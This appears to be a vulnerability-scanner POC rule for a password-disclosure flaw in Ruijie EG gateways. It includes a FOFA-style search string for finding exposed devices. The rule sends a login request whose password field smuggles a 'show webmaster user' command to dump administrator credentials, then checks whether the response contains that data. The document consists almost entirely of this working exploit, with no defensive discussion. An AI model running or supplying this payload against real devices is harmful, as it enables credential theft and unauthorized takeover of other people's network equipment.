漏洞描述
app="Ruijie-EG易网关"
id: ruijie-eg-password-leak
info:
name: Ruijie EG Information Disaclosure
author: Search?=Null
severity: high
verified: true
description: app="Ruijie-EG易网关"
rules:
r0:
request:
method: POST
path: /login.php
body: |
username=admin&password=admin?show+webmaster+user
expression: response.status == 200 && response.body.bcontains(b'"data":') && response.body.bcontains(b'admin') && response.body.bcontains(b'"status":')
expression: r0()